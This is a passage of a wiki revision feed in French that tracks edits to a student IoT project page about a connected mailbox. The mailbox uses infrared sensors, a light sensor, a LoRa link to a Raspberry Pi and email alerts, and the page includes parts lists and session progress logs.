[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &lt;br /&gt;
* contreplaqué pour la découpe de la boîte.&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36952</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36952"/>
				<updated>2017-01-05T16:36:17Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Séance 2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &lt;br /&gt;
* contreplaqué pour la découpe de la boîte.&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36951</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36951"/>
				<updated>2017-01-05T16:31:25Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Matériel nécessaire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &lt;br /&gt;
* contreplaqué pour la découpe de la boîte.&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36712</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36712"/>
				<updated>2017-01-03T13:45:49Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:red&amp;quot;&amp;gt;[non reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:red&amp;quot;&amp;gt;[non reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc&lt;br /&gt;
* contreplaqué pour la découpe de la boîte.&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36711</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36711"/>
				<updated>2017-01-03T13:41:37Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:red&amp;quot;&amp;gt;[non reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:red&amp;quot;&amp;gt;[non reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc&lt;br /&gt;
* contreplaqué pour la découpe de la boîte.&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36709</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36709"/>
				<updated>2017-01-03T13:39:07Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Matériel nécessaire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:red&amp;quot;&amp;gt;[non reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:red&amp;quot;&amp;gt;[non reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc&lt;br /&gt;
* contreplaqué pour la découpe de la boîte.&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36679</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36679"/>
				<updated>2017-01-03T10:39:43Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Objectif du projet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi&lt;br /&gt;
* Puce LoRa pour Raspberry&lt;br /&gt;
* Module µ-controleur + antenne LoRa&lt;br /&gt;
* 10 LED infrarouges&lt;br /&gt;
* 10 récepteurs infrarouges&lt;br /&gt;
* 1 capteur de luminosité&lt;br /&gt;
* 1m de tube en pvc&lt;br /&gt;
* contreplaqué pour la découpe de la boîte.&lt;br /&gt;
* Beaucoup de fierté pour assumer le vol d'idée&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:IoT.png&amp;diff=36678</id>
		<title>Fichier:IoT.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:IoT.png&amp;diff=36678"/>
				<updated>2017-01-03T10:37:24Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36664</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36664"/>
				<updated>2017-01-03T10:19:10Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Choix techniques */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi&lt;br /&gt;
* Puce LoRa pour Raspberry&lt;br /&gt;
* Module µ-controleur + antenne LoRa&lt;br /&gt;
* 10 LED infrarouges&lt;br /&gt;
* 10 récepteurs infrarouges&lt;br /&gt;
* 1 capteur de luminosité&lt;br /&gt;
* 1m de tube en pvc&lt;br /&gt;
* contreplaqué pour la découpe de la boîte.&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36647</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36647"/>
